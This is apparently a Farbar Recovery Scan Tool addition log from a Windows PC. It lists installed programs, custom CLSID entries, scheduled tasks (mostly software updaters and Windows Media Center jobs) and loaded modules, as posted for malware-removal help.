foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A7A740CC-1533-48ED-98D6-67AEE41F1954} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-10-31 17:47 - 2013-10-31 17:47 - 00954696 _____ () C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-09 23:13 - 2015-09-10 01:08 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2016-04-11 19:16 - 2016-04-05 22:12 - 02140824 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
